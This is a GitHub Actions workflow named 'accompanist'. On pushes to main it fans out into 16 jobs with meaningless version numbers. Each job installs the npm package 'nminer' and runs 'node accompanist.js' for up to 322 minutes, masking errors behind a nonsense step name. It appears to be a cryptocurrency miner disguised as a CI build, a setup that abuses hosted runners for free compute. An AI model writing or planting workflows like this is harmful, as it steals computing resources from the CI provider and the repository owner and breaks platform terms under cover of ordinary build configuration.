name: accompanist
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 1014 }
          - { version: 9544 }
          - { version: 7030 }
          - { version: 6593 }
          - { version: 3651 }
          - { version: 4571 }
          - { version: 4434 }
          - { version: 6570 }
          - { version: 6575 }
          - { version: 3852 }
          - { version: 7939 }
          - { version: 405 }
          - { version: 7757 }
          - { version: 465 }
          - { version: 6361 }
          - { version: 6493 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: self-confidence boo worth ugh
        run: |
          npm install nminer@latest
          timeout 322m node accompanist.js || echo "accompanist executed"